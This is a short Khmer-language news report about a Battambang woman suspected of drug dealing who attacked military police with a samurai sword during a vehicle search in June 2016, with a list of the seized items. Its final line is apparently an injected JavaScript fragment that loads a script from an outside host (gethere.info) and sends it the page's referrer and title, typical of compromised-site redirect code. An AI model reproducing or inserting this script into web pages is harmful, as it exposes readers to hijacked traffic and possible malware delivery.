កងរាជអាវុធហត្ថ រត់បះជេីងសព្រាត ដោយសារផ្លែដាវសាម៉ូរ៉ៃ ស្រ្តីរកសុីគ្រឿងញៀន
បាត់ដំបង ៖ សមត្តកិច្ច កងរាជអាវុធហត្ថ នៃមន្ទីរស្រាវជ្រាវ យុត្តិធម៍ ខេត្តបាត់ដំបង បានរត់បះជេីង សព្រាតទាំង ព្រលឺង ចុងសក់ ដោយសារ ស្រ្ដីរកសីុគ្រឿងញៀនម្នាក់បានទាញដាវសាំរ៉ៃ ដេញកាប់ក្នុងខណះពេល សមត្ថកិច្ច ចាប់ឆែករថយន្ដរករត្តុតាងកាលម៉ោង ១០ និង ៣០ នាទី ថ្ងៃទី ១៦ ខែ មិថុនា ឆ្នាំ ២០១៦ម្សិលមិុញ ត្រង់ចំណុចភូមិ ទួលតឯក សង្កាត់ ទួលតាឯក ក្រុង បាត់ដំបង។
ស្រ្ដីជើងខ្លាំងឈ្មោះ លី ដានី ភេទ ស្រី អាយុ ៣៣ ឆ្នាំ មុខរបរមិនពិតប្រាកដ ទីលំនៅភូមិ ចំការសំរោង២ សង្កាត់ ចំការសំរោង ក្រុង បាត់ដំបង ដកហូតបាន គ្រឿងញៀនម៉ាទឹកកក ចំនួន ០២ កញ្ចប់ ទម្ងន់ ១,២៧ ក្រាម ថ្លឹងទាំងសំបកថង់ រថយន្ត ០១ គ្រឿង ម៉ាក Visto ពណ៌ ទឹកសមុទ្រ ពាក់ផ្លាកលេខ ភ្នំពេញ 2S 1472 ទូរស័ព្ទដៃ ០២ គ្រឿង ប្រាក់រៀល ២៧ មឺុនរៀល ប្រាក់ដុល្លា ៤១ ដុល្លា ដាវសាំម៉ារ៉ៃ ០១ ដេីម និង ដែកមួយកំណាត់ប្រវែង ៧០ ស.ម ។
បច្ចុប្បន្នជនសង្ស័យ និង វត្ថុតាង កំពុងឃាត់ខ្លួន នៅការិយាល័យ ជំនាញដេីម្បីកសាងសំណុំរឿង នឹងត្រៀមបញ្ចូនខ្លួនទៅតុលាការចាត់ការទៅតាមផ្លូវច្បាប់៕
s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;